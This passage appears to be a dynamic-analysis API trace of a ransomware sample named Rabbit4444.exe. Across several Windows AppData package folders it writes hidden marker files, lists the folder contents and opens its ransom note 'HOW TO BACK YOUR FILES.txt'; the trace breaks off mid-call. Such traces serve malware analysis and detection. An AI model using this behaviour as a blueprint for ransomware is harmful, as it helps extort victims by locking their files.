(in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory" [0066.630] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory\\" [0066.630] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0066.630] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.631] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.634] FlushFileBuffers (hFile=0x228) returned 1 [0066.635] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.636] CloseHandle (hObject=0x228) returned 1 [0066.636] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory") returned 110 [0066.636] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.636] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf109384b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.636] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.637] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.637] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.637] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.637] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf109384b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.637] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.637] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.637] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.637] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.637] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.637] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf109384b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf109384b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf109384b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.637] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.637] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.637] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf109384b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf109384b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf109384b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.637] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.637] lstrcpyW (in: lpString1=0x130ec16, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.637] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.638] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.638] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.638] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.638] CloseHandle (hObject=0x27c) returned 1 [0066.638] CloseHandle (hObject=0x228) returned 1 [0066.638] GetCurrentThreadId () returned 0xd98 [0066.638] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0066.638] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies" [0066.638] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x126138 | out: hHeap=0xe0000) returned 1 [0066.638] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0066.638] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies" [0066.638] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies\\" [0066.638] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0066.639] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.640] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.642] FlushFileBuffers (hFile=0x228) returned 1 [0066.643] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.643] CloseHandle (hObject=0x228) returned 1 [0066.644] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies") returned 110 [0066.644] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.644] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf10b9975, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.644] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.644] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.644] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.644] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.644] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf10b9975, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.644] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.644] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.644] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.644] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.644] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.644] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf10b9975, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf10b9975, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf10b9975, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.644] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.644] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.644] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf10b9975, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf10b9975, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf10b9975, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.644] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.644] lstrcpyW (in: lpString1=0x130ec16, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.645] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.645] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.645] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.645] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.646] CloseHandle (hObject=0x27c) returned 1 [0066.646] CloseHandle (hObject=0x228) returned 1 [0066.646] GetCurrentThreadId () returned 0xd98 [0066.646] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0066.646] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache" [0066.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125658 | out: hHeap=0xe0000) returned 1 [0066.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0066.646] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache" [0066.646] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache\\" [0066.646] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0066.646] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.647] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.649] FlushFileBuffers (hFile=0x228) returned 1 [0066.650] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.650] CloseHandle (hObject=0x228) returned 1 [0066.652] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache") returned 108 [0066.652] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.652] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf10b9975, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.652] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.653] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.653] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.653] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.653] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf10b9975, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.653] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.653] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.653] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.653] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.653] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.653] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf10b9975, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf10b9975, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf10b9975, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.653] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.653] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.653] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf10b9975, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf10b9975, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf10b9975, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.653] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.653] lstrcpyW (in: lpString1=0x130ec12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.653] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.653] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.654] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.654] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.654] CloseHandle (hObject=0x27c) returned 1 [0066.654] CloseHandle (hObject=0x228) returned 1 [0066.654] GetCurrentThreadId () returned 0xd98 [0066.654] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11d0e8 [0066.654] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy" [0066.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db78 | out: hHeap=0xe0000) returned 1 [0066.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d0e0 | out: hHeap=0xe0000) returned 1 [0066.654] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy" [0066.654] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\" [0066.654] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") 